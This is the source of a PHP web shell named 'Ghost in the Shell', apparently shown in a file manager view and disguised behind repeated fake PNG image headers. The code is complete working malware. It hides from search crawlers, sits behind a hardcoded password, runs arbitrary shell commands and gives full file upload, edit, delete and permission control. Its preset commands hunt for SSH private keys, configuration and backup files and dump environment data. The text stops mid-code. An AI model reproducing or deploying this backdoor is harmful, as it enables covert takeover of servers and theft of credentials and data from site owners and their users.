Tiny File Manager | ghost.php

Back Back Up Normal Editor

<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> MonoGrid WP-PNG</title>‰PNG  <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> MonoGrid WP-PNG</title>‰PNG  <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> MonoGrid WP-PNG</title>‰PNG  <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> MonoGrid WP-PNG</title>‰PNG  <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> MonoGrid WP-PNG</title>‰PNG  <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> MonoGrid WP-PNG</title>‰PNG  <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> MonoGrid WP-PNG</title>‰PNG  <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> MonoGrid WP-PNG</title>‰PNG  <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> MonoGrid WP-PNG</title>‰PNG  <html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title> MonoGrid WP-PNG</title>‰PNG <?php error_reporting(0); session_start(); if (!empty($_SERVER['HTTP_USER_AGENT'])) { $bots = ['Googlebot', 'Slurp', 'MSNBot', 'PycURL', 'facebookexternalhit', 'ia_archiver', 'crawler', 'Yandex', 'Rambler', 'Yahoo! Slurp', 'YahooSeeker', 'bingbot', 'curl']; if (preg_match('/' . implode('|', $bots) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } if(!isset($_SESSION['gits_login'])) { if(isset($_POST['pass']) && $_POST['pass'] == 'ghost') { // Ganti password di sini $_SESSION['gits_login'] = true; header("Location: ?"); exit; } else { echo '<style>body{background:black;color:aqua;font-family:monospace;display:flex;justify-content:center;align-items:center;height:100vh;}form{border:1px solid aqua;padding:20px;}input{background:#222;color:aqua;border:1px solid aqua;padding:5px;}</style>'; echo '<form method="POST"><input type="password" name="pass" placeholder="Enter Password"><input type="submit" value="Login"></form>'; exit; } } $raw_path = isset($_GET['path']) ? urldecode($_GET['path']) : getcwd(); $raw_path = str_replace("\0", '', trim($raw_path)); if ($raw_path === '') { $raw_path = getcwd(); } if (!preg_match('#^(?:/|[A-Za-z]:\\\\)#', $raw_path)) { $try_path = getcwd() . DIRECTORY_SEPARATOR . ltrim($raw_path, './\\'); } else { $try_path = $raw_path; } $resolved_path = @realpath($try_path); if ($resolved_path === false && file_exists($try_path)) { $current_path = $try_path; } elseif ($resolved_path) { $current_path = $resolved_path; } else { $current_path = getcwd(); } if (!file_exists($current_path)) { $current_path = getcwd(); } $breadcrumbs = []; $parts = explode(DIRECTORY_SEPARATOR, trim($current_path, DIRECTORY_SEPARATOR)); $accum_path = DIRECTORY_SEPARATOR; foreach ($parts as $part) { if ($part === '') continue; $accum_path .= $part . DIRECTORY_SEPARATOR; $breadcrumbs[] = ['name'=>$part,'path'=>$accum_path]; } // ---------------------------------------------------------------------- $message = ''; $rename_form = ''; $current_tab = isset($_GET['tab']) ? $_GET['tab'] : 'filemanager'; $command_output = ''; // Handle Upload if(isset($_FILES['up'])) { $file_name = basename($_FILES['up']['name']); $target_path = $current_path . DIRECTORY_SEPARATOR . $file_name; if(move_uploaded_file($_FILES['up']['tmp_name'], $target_path)) { $message = "Upload Success: $file_name"; } else { $message = "Upload Failed!"; } header("Location: ?path=" . urlencode($current_path) . "&msg=" . urlencode($message)); exit; } // Handle Delete if(isset($_GET['act']) && $_GET['act'] == 'del' && isset($_GET['file'])) { $file_name = basename($_GET['file']); $target_path = $current_path . DIRECTORY_SEPARATOR . $file_name; if(is_file($target_path)) { if(unlink($target_path)) { $message = "Deleted File: $file_name"; } else { $message = "Failed to delete file: $file_name"; } } else if (is_dir($target_path)) { if(@rmdir($target_path)) { $message = "Directory Deleted: $file_name"; } else { $message = "Failed to delete directory (must be empty!): $file_name"; } } header("Location: ?path=" . urlencode($current_path) . "&msg=" . urlencode($message)); exit; } // Handle Rename (Proses) if(isset($_POST['ren']) && isset($_POST['oldname']) && isset($_POST['newname'])) { $old_name = basename($_POST['oldname']); $new_name = basename($_POST['newname']); $old_path = $current_path . DIRECTORY_SEPARATOR . $old_name; $new_path = $current_path . DIRECTORY_SEPARATOR . $new_name; if(rename($old_path, $new_path)) { $message = "Renamed $old_name to $new_name"; } else { $message = "Failed to rename!"; } header("Location: ?path=" . urlencode($current_path) . "&msg=" . urlencode($message)); exit; } // Handle Rename (Tampilkan Form) if(isset($_GET['act']) && $_GET['act'] == 'rename' && isset($_GET['file'])) { $f = htmlspecialchars(basename($_GET['file'])); $rename_form = ' <form method="POST"> Rename <strong>'.$f.'</strong> to: <input type="text" name="newname" value="'.$f.'"> <input type="hidden" name="oldname" value="'.$f.'"> <input type="submit" name="ren" value="Rename"> </form><hr>'; } // Handle Command Execution if(isset($_POST['cmd'])) { $command = $_POST['cmd']; if(function_exists('shell_exec')) { $command_output = shell_exec($command . ' 2>&1'); } else if(function_exists('system')) { ob_start(); system($command); $command_output = ob_get_clean(); } else if(function_exists('exec')) { exec($command, $output); $command_output = implode("\n", $output); } else { $command_output = "Command execution functions disabled"; } } // Handle File Edit if(isset($_POST['edit_file']) && isset($_POST['file_content']) && isset($_POST['file_path'])) { $file_path = $_POST['file_path']; $content = $_POST['file_content']; if(file_put_contents($file_path, $content)) { $message = "File saved successfully"; } else { $message = "Failed to save file"; } } // Handle File View/Edit Request if(isset($_GET['act']) && $_GET['act'] == 'edit' && isset($_GET['file'])) { $file_to_edit = $current_path . DIRECTORY_SEPARATOR . basename($_GET['file']); if(is_file($file_to_edit) && is_readable($file_to_edit)) { $file_content = htmlspecialchars(file_get_contents($file_to_edit)); $current_tab = 'editor'; } } // Handle New File Creation if(isset($_POST['new_file_name'])) { $new_file = $current_path . DIRECTORY_SEPARATOR . basename($_POST['new_file_name']); if(touch($new_file)) { $message = "File created: " . basename($_POST['new_file_name']); } else { $message = "Failed to create file"; } } // Handle New Directory Creation if(isset($_POST['new_dir_name'])) { $new_dir = $current_path . DIRECTORY_SEPARATOR . basename($_POST['new_dir_name']); if(mkdir($new_dir)) { $message = "Directory created: " . basename($_POST['new_dir_name']); } else { $message = "Failed to create directory"; } } // Handle File Download if(isset($_GET['act']) && $_GET['act'] == 'download' && isset($_GET['file'])) { $file_to_download = $current_path . DIRECTORY_SEPARATOR . basename($_GET['file']); if(is_file($file_to_download) && is_readable($file_to_download)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($file_to_download).'"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file_to_download)); readfile($file_to_download); exit; } } // Handle File Permissions Change if(isset($_POST['chmod_file']) && isset($_POST['file_path']) && isset($_POST['permissions'])) { $file_path = $_POST['file_path']; $permissions = octdec($_POST['permissions']); if(chmod($file_path, $permissions)) { $message = "Permissions changed successfully"; } else { $message = "Failed to change permissions"; } } if(isset($_GET['msg'])) { $message = htmlspecialchars($_GET['msg']); } //helper function perms($file_path) { return substr(sprintf('%o', fileperms($file_path)), -4); } function format_size($bytes) { if ($bytes >= 1073741824) { return number_format($bytes / 1073741824, 2) . ' GB'; } elseif ($bytes >= 1048576) { return number_format($bytes / 1048576, 2) . ' MB'; } elseif ($bytes >= 1024) { return number_format($bytes / 1024, 2) . ' KB'; } else { return $bytes . ' bytes'; } } function get_file_icon($file) { $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION)); $icons = [ 'php' => '🔵', 'html' => '🌐', 'css' => '🎨', 'js' => '📜', 'txt' => '📄', 'pdf' => '📕', 'zip' => '📦', 'jpg' => '🖼️', 'png' => '🖼️', 'gif' => '🖼️', 'sql' => '🗃️', 'xml' => '📋', 'json' => '📋', 'log' => '📋' ]; return $icons[$ext] ?? '📄'; } function get_system_folders() { $common_folders = [ '/' => 'Root Directory', '/bin' => 'Essential User Binaries', '/boot' => 'Boot Loader Files', '/dev' => 'Device Files', '/etc' => 'Configuration Files', '/home' => 'User Home Directories', '/lib' => 'System Libraries', '/media' => 'Removable Media', '/mnt' => 'Mounted File Systems', '/opt' => 'Optional Software', '/proc' => 'Process Information', '/root' => 'Root User Home', '/run' => 'Runtime Data', '/sbin' => 'System Binaries', '/srv' => 'Service Data', '/sys' => 'System Information', '/tmp' => 'Temporary Files', '/usr' => 'User Programs', '/var' => 'Variable Data', '/var/www' => 'Web Server Root', '/var/log' => 'System Logs', '/etc/apache2' => 'Apache Configuration', '/etc/nginx' => 'Nginx Configuration', '/etc/mysql' => 'MySQL Configuration', '/var/lib/mysql' => 'MySQL Data', '/var/log/apache2' => 'Apache Logs', '/var/log/nginx' => 'Nginx Logs' ]; $available_folders = []; foreach($common_folders as $folder => $description) { if(is_dir($folder) && is_readable($folder)) { $available_folders[$folder] = $description; } } return $available_folders; } // Get files and directories $files = @scandir($current_path) ?: []; $system_folders = get_system_folders(); ?> <style> body { background-color: black; color: aqua; font-family: monospace; margin: 15px; } a { color: white; text-decoration: none; font-weight: bold; } a:hover { color: aqua; } table { width: 100%; border-collapse: collapse; margin-top: 15px; } th, td { border: 1px solid aqua; padding: 8px; } th { background: #111; text-align: left;} tr:hover { background: #202020; } input, select, button, [type=submit] { background: #222; color: aqua; border: 1px solid aqua; padding: 5px; margin: 2px; } .path a { color: aqua; } .message { background: #333; border: 1px solid aqua; padding: 10px; margin-bottom: 15px; } .header { border-bottom: 2px solid aqua; padding-bottom: 10px; word-wrap: break-word; } .action-links a { color: #FFD700; } .action-links a:hover { color: #FFA500; } .file-name { word-wrap: break-word; max-width: 400px; } .nav-tabs { margin: 20px 0; border-bottom: 1px solid aqua; } .nav-tabs a { display: inline-block; padding: 10px 20px; margin-right: 5px; border: 1px solid aqua; } .nav-tabs a.active { background: aqua; color: black; } .tab-content { margin: 20px 0; } .cmd-output { background: #000; color: #00ff00; padding: 15px; border: 1px solid aqua; max-height: 400px; overflow-y: auto; } textarea { width: 100%; height: 400px; background: #111; color: aqua; border: 1px solid aqua; } .system-folders { background: #222; padding: 15px; margin: 15px 0; border: 1px solid aqua; } .folder-grid { display: grid; grid-template-columns: repeat(auto-fill, minmax(200px, 1fr)); gap: 10px; margin-top: 10px; } .folder-item { background: #333; padding: 8px; border: 1px solid #444; } .folder-item:hover { background: #444; } .folder-name { font-weight: bold; color: aqua; } .folder-desc { font-size: 11px; color: #888; } </style> <div class="header"> <h2>Ghost in the Shell - 6ickzone</h2> <p>Where creativity, exploitation, and expression collide</p>  <div class="system-folders"> <h3>📂 Available System Folders</h3> <div class="folder-grid"> <?php foreach($system_folders as $folder => $description): ?> <div class="folder-item"> <a href="?path=<?php echo urlencode($folder); ?>" class="folder-name"> 📁 <?php echo htmlspecialchars($folder); ?> </a> <div class="folder-desc"><?php echo htmlspecialchars($description); ?></div> </div> <?php endforeach; ?> </div> </div> <hr> <div class="path"> <?php echo '<div style="margin-bottom:10px;">'; echo '<a href="?path=/" style="text-decoration:none;">Root</a>'; foreach ($breadcrumbs as $bc) { echo ' » '; echo '<a href="?path=' . urlencode($bc['path']) . '" style="text-decoration:none;">' . htmlspecialchars($bc['name']) . '</a>'; } echo '</div>'; // up one $parent_path = dirname(rtrim($current_path, DIRECTORY_SEPARATOR)) . DIRECTORY_SEPARATOR; if ($parent_path !== $current_path) { echo '<a href="?path=' . urlencode($parent_path) . '">../ Up One Level</a><br>'; } ?> </div> </div> <?php if($message) { echo "<div class='message'>$message</div>"; } if($rename_form) { echo $rename_form; } ?> <hr> <h3>Quick Actions</h3> <form method="POST" style="margin-bottom:8px;"> <input type="text" name="new_file_name" placeholder="New file name" required> <input type="submit" value="Create File"> </form> <form method="POST" style="margin-bottom:8px;"> <input type="text" name="new_dir_name" placeholder="New directory name" required> <input type="submit" value="Create Directory"> </form> <form method="POST" enctype="multipart/form-data" style="margin-bottom:8px;"> <input type="file" name="up"> <input type="submit" value="Upload"> </form>  <div class="nav-tabs"> <a href="?path=<?php echo urlencode($current_path); ?>&tab=filemanager" class="<?php echo $current_tab == 'filemanager' ? 'active' : ''; ?>">📁 File Manager</a> <a href="?path=<?php echo urlencode($current_path); ?>&tab=command" class="<?php echo $current_tab == 'command' ? 'active' : ''; ?>">💻 Command</a> <a href="?path=<?php echo urlencode($current_path); ?>&tab=info" class="<?php echo $current_tab == 'info' ? 'active' : ''; ?>">ℹ️ System Info</a> </div> <div class="tab-content"> <?php if($current_tab == 'filemanager'): ?>  <table> <tr> <th>Name</th> <th>Size</th> <th>Permissions</th> <th>Owner</th> <th>Modified</th> <th>Actions</th> </tr> <?php // Parent directory $parent_path = dirname($current_path); if($parent_path != $current_path): ?> <tr> <td class="file-name"><a href="?path=<?php echo urlencode($parent_path); ?>">📁 [..]</a></td> <td>-</td> <td>-</td> <td>-</td> <td>-</td> <td>-</td> </tr> <?php endif; ?> <?php $folders = []; $files_list = []; foreach($files as $file) { if($file == '.' || $file == '..') continue; $filepath = $current_path . DIRECTORY_SEPARATOR . $file; if(is_dir($filepath)) { $folders[] = $file; } else { $files_list[] = $file; } } // Tampilkan Folder dulu foreach($folders as $file): $filepath = $current_path . DIRECTORY_SEPARATOR . $file; $link = "?path=" . urlencode($current_path) . "&file=" . urlencode($file); $owner = function_exists('posix_getpwuid') ? posix_getpwuid(fileowner($filepath))['name'] : fileowner($filepath); $modified = date('Y-m-d H:i:s', filemtime($filepath)); ?> <tr> <td class="file-name"> <a href="?path=<?php echo urlencode($filepath); ?>">📁 <?php echo htmlspecialchars($file); ?></a> </td> <td>-</td> <td><?php echo perms($filepath); ?></td> <td><?php echo $owner; ?></td> <td><?php echo $modified; ?></td> <td class="action-links"> <a href="<?php echo $link; ?>&act=rename">Rename</a> | <a href="<?php echo $link; ?>&act=del" onclick="return confirm('Delete folder <?php echo $file; ?>?');">Delete</a> </td> </tr> <?php endforeach; ?> <?php // Tampilkan File foreach($files_list as $file): $filepath = $current_path . DIRECTORY_SEPARATOR . $file; $link = "?path=" . urlencode($current_path) . "&file=" . urlencode($file); $owner = function_exists('posix_getpwuid') ? posix_getpwuid(fileowner($filepath))['name'] : fileowner($filepath); $modified = date('Y-m-d H:i:s', filemtime($filepath)); ?> <tr> <td class="file-name"><?php echo get_file_icon($file); ?> <?php echo htmlspecialchars($file); ?></td> <td><?php echo format_size(filesize($filepath)); ?></td> <td><?php echo perms($filepath); ?></td> <td><?php echo $owner; ?></td> <td><?php echo $modified; ?></td> <td class="action-links"> <a href="<?php echo $link; ?>&act=edit">Edit</a> | <a href="<?php echo $link; ?>&act=rename">Rename</a> | <a href="<?php echo $link; ?>&act=download">Download</a> | <a href="<?php echo $link; ?>&act=del" onclick="return confirm('Delete file <?php echo $file; ?>?');">Delete</a> </td> </tr> <?php endforeach; ?> </table> <?php elseif($current_tab == 'command'): ?>  <h3>Command Execution</h3> <form method="POST"> <input type="text" name="cmd" placeholder="Enter command (e.g., ls -la, whoami, pwd)" style="width: 70%;"> <input type="submit" value="Execute"> </form> <?php if($command_output): ?> <h4>Command Output:</h4> <div class="cmd-output"><?php echo htmlspecialchars($command_output); ?></div> <?php endif; ?> <h4>Quick Commands:</h4> <div style="margin: 10px 0;"> <?php $quick_commands = [ 'System Info' => 'uname -a', 'Current User' => 'whoami', 'Process List' => 'ps aux', 'Network Info' => 'ifconfig || ip addr', 'Disk Usage' => 'df -h', 'Memory Info' => 'free -h', 'PHP Info' => 'php -v', 'Web Server' => 'apache2 -v || nginx -v', 'List Services' => 'systemctl list-units --type=service || service --status-all', 'Network Connections' => 'netstat -tulpn || ss -tulpn', 'Logged Users' => 'w || who', 'System Uptime' => 'uptime', 'Kernel Modules' => 'lsmod', 'Mounted Filesystems' => 'mount', 'Environment Variables' => 'env', 'Cron Jobs' => 'crontab -l', 'Package Manager' => 'apt list --installed 2>/dev/null || yum list installed 2>/dev/null || dpkg -l' ]; foreach($quick_commands as $label => $cmd): ?> <form method="POST" style="display: inline-block; margin: 2px;"> <input type="hidden" name="cmd" value="<?php echo htmlspecialchars($cmd); ?>"> <input type="submit" value="<?php echo $label; ?>" style="font-size: 12px; padding: 3px 6px;"> </form> <?php endforeach; ?> </div> <h4>File Operations Commands:</h4> <div style="margin: 10px 0;"> <?php $file_commands = [ 'List Files' => 'ls -la', 'Find PHP Files' => 'find / -name "*.php" -type f 2>/dev/null | head -20', 'Find Config Files' => 'find / -name "*.conf" -type f 2>/dev/null | head -20', 'Find Log Files' => 'find /var/log -type f -name "*.log" 2>/dev/null | head -20', 'Find Backup Files' => 'find / -name "*.bak" -o -name "*.backup" -type f 2>/dev/null | head -20', 'Find SSH Keys' => 'find / -name "id_rsa" -o -name "id_dsa" -type f 2>/dev/null | head -10', 'Current Directory' => 'pwd', 'Disk Space' => 'du -sh .' ]; foreach($file_commands as $label => $cmd): ?> <form method="POST" style="display: inline-block; margin: 2px;"> <input type="hidden" name="cmd" value="<?php echo htmlspecialchars($cmd); ?>"> <input type="submit" value="<?php echo $label; ?>" style="font-size: 12px; padding: 3px 6px;"> </form> <?php endforeach; ?> </div> <?php elseif($current_tab == 'editor'): ?>  <h3>File Editor</h3> <?php if(isset($file_content)): ?> <form method="POST"> <input type="hidden" name="file_path" value="<?php echo htmlspecialchars($file_to_edit); ?>"> <textarea name="file_content"><?php echo $file_content; ?></textarea><br> <input type="submit" name="edit_file" value="Save File"> </form> <?php else: ?> <p>Select a file to edit from the File Manager tab.</p> <?php endif; ?> <?php elseif($current_tab == 'info'): ?>  <h3>System Information</h3> <table> <tr><td><strong>PHP Version:</strong></td><td><?php echo phpversion(); ?></td></tr> <tr><td><strong>Server Software:</strong></td><td><?php echo $_SERVER['SERVER_SOFTWARE'] ?? 'N/A'; ?></td></tr> <tr><td><strong>Server IP:</strong></td><td><?php echo $_SERVER['SERVER_ADDR'] ?? 'N/A'; ?></td></tr> <tr><td><strong>Client IP:</strong></td><td><?php echo $_SERVER['REMOTE_ADDR'] ?? 'N/A'; ?></td></tr> <tr><td><strong>Document Root:</strong></td><td><?php echo $_SERVER['DOCUMENT_ROOT'] ?? 'N/A'; ?></td></tr> <tr><td><strong>Operating System:</strong></td><td><?php echo php_uname(); ?></td></tr> <tr><td><strong>Current User:</strong></td><td><?php echo function_exists('get_current_user') ? get_current_user() : 'N/A'; ?></td></tr> <tr><td><strong>Memory Limit:</strong></td><td><?php echo ini_get('memory_limit'); ?></td></tr> <tr><td><strong>Max Execution Time:</strong></td><td><?php echo ini_get('max_execution_time'); ?> seconds</td></tr> <tr><td><strong>Disabled Functions:</strong></td><td><?php echo ini_get('disable_functions') ?: 'None'; ?></td></tr> <tr><td><strong>Open Basedir:</strong></td><td><?php echo ini_get('open_basedir') ?: 'None'; ?></td></tr> <tr><td><strong>Safe Mode:</strong></td><td><?php echo ini_get('safe_mode') ? 'Enabled' : 'Disabled'; ?></td></tr> <tr><td><strong>Allow URL Include:</strong></td><td><?php echo ini_get('allow_url_include') ? 'Yes' : 'No'; ?></td></tr> <tr><td><strong>Allow URL Fopen:</strong></td><td><?php echo ini_get('allow_url_fopen') ? 'Yes' : 'No'; ?></td></tr> </table> <h4>PHP Extensions:</h4> <div style="max-height: 200px; overflow-y: auto; background: #111; padding: 10px; border: 1px solid aqua;"> <?php $extensions = get_loaded_extensions(); echo implode(', ', $extensions); ?> </div> <h4>Server Environment:</h4> <div style="max-height: 200px; overflow-y: auto; background: #111; padding: 10px; border: 1px solid aqua; font-family: monospace; font-size: 13px;"> <?php foreach($_SERVER as $key => $value) { if(!is_array($value)) { echo "<strong>$key:</strong> " . htmlspecialchars($value) . "<br>"; } } ?> </div> <h4>Database Information:</h4> <div style="background: #111; padding: 10px; border: 1px solid aqua;"> <?php // Check MySQL if(function_exists('mysqli_connect')) { echo "MySQLi: Available<br>"; } else { echo "MySQLi: Not Available<br>"; } // Check PDO if(class_exists('PDO')) { $pdo_drivers = PDO::getAvailableDrivers(); echo "PDO Drivers: " . implode(', ', $pdo_drivers) . "<br>"; } else { echo "PDO: